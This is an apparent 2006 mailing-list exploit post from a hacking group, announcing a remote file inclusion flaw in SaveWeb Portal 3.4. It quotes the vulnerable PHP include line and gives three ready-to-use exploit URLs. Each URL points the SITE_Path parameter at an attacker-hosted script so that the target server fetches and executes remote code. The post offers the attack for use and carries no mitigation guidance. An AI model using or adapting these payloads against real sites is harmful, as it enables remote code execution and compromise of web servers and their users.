SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability

x0r0n Wed, 02 Aug 2006 12:24:10 -0700

///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\


#SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability     


- 


#Author: xoron


-


#script: SaveWeb Portal


-


#Class : Remote


-


[EMAIL PROTECTED]: x0r0n[at]hotmail[dot]com


-


#CODE:    include($SITE_Path."poll/poll.php")


-


#Exploit:

http://www.site.com/[path]/menu_dx.php?SITE_Path=http://evil_scripts?

http://www.site.com/[path]/poll/poll.php?SITE_Path=http://evil_scripts?

http://www.site.com/[path]/poll/view_polls.php?SITE_Path=http://evil_scripts?


-


#Thanx : WWW.CYBER-WARRiOR.ORG


-


#Greetz: DJR, x-mastER, LASTSCREAM , zip72_72, R3D4C!D and all cyber-warrior 
users.


///////////////////CYBER-WARRiOR.ORG\\\\\\\\\\\\\\\\\\\\\

SaveWeb Portal 3.4 <- (SITE_Path) Remote File Inclusion Vulnerability

Reply via email to